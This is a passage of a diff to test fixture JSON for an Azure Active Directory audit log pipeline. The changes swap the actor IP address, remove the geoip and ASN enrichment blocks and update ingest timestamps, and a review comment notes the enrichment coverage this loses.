Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2231,25 +2033,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -2263,7 +2047,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -2399,7 +2183,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
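Review bot: The new expected output drops the whole `source.geo` and `source.as` blocks instead of replacing them, so this fixture no longer verifies that the geoip and ASN enrichment steps of the pipeline act on `source.ip`; only the bare `"ip": "67.43.156.15"` remains. If the replacement address is meant to be one the test tooling can enrich, the expected document should carry the corresponding `source.geo` and `source.as` values for it; if enrichment is expected to be absent for this address, saying so in the PR description or changelog entry would keep the lost coverage from being mistaken for a regression later. The same pattern repeats in the hunks starting `@@ -2442,25 +2226,7 @@` and `@@ -2653,25 +2419,7 @@`. The enclosing event object starts and ends outside this hunk.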
@@ -2411,12 +2195,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036131200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124892700Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2442,25 +2226,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -2474,7 +2240,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -2610,7 +2376,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -2622,12 +2388,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036141100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124899400Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"e